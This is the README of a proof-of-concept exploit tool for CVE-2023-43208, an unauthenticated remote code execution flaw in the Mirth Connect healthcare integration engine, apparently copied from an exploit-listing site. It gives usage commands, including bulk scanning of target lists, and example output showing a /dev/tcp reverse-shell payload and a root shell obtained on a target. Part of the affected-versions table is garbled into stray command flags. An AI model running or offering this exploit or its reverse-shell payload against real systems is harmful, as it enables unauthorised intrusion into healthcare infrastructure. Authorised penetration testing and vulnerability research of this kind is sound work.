Share
## https://sploitus.com/exploit?id=3922D9D7-A31E-594D-ACB5-7638B859E2E8
# CVE-2023-43208 โ€” Mirth Connect RCE

![Python](https://img.shields.io/badge/Python-3.x-blue?style=flat-square)
![CVE](https://img.shields.io/badge/CVE-2023--43208-red?style=flat-square)
![Platform](https://img.shields.io/badge/Platform-Linux-lightgrey?style=flat-square)

> Proof-of-Concept exploit for **CVE-2023-43208**, an unauthenticated Remote Code Execution vulnerability in **Mirth Connect** versions prior to `4.4.1`.

---

## Description

Mirth Connect is a widely deployed open-source healthcare integration engine. This vulnerability leverages a Java deserialization flaw via the `/api/users` endpoint using a crafted XML payload chaining Apache Commons Collections gadgets to achieve unauthenticated RCE.

The enhanced version replaces the original `pwncat` listener with a fully dependency-free interactive PTY shell using Python builtins only (`socket`, `select`, `tty`, `termios`). The shell is automatically upgraded to a full PTY on connection.

---

## Affected Versions

| Software       | Vulnerable Versions | Fixed Version |
|----------------|---------------------|---------------|
| Mirth Connect  |  -lh  -lp 
```

### Single Target โ€” With ngrok / Bind Port

```bash
python3 CVE-2023-43208.py -u https:// -lh  -lp  -bp 
```

### Bulk Scan from File

```bash
python3 CVE-2023-43208.py -f targets.txt -t 50 -o vulnerable.txt
```

---

## Arguments

| Flag              | Description                                      |
|-------------------|--------------------------------------------------|
| `-u`, `--url`     | Target URL                                       |
| `-lh`, `--lhost`  | Your listening IP                                |
| `-lp`, `--lport`  | Your listening port                              |
| `-bp`, `--bindport` | Bind port override (useful with ngrok)         |
| `-f`, `--file`    | File containing list of target URLs              |
| `-o`, `--output`  | Save vulnerable targets to file                  |
| `-t`, `--threads` | Number of threads for scanning (default: 50)     |

---

## Example Output

```
[*] Setting up listener on 10.10.15.202:4444 and launching exploit...
[*] Waiting for incoming connection on port 4444...
[*] Looking for Mirth Connect instance...
[+] Found Mirth Connect instance
[+] Vulnerable Mirth Connect version 4.4.0 instance found at https://10.129.5.3
[!] sh -c $@|sh . echo bash -c '0/dev/tcp/...'
[*] Launching exploit against https://10.129.5.3...
[+] Received connection from 10.129.5.3:59640
[+] Shell opened! Upgrading to PTY...

root@mirth:/# 
```

---

## Disclaimer

> This tool is intended for **authorized penetration testing and educational purposes only**.  
> Unauthorized use against systems you do not own or have explicit permission to test is **illegal**.  
> The authors are not responsible for any misuse or damage caused by this tool.

---

## Credits

- **Coded by:** K3ysTr0K3R and Chocapikk
- **Enhanced by:** 4nuxd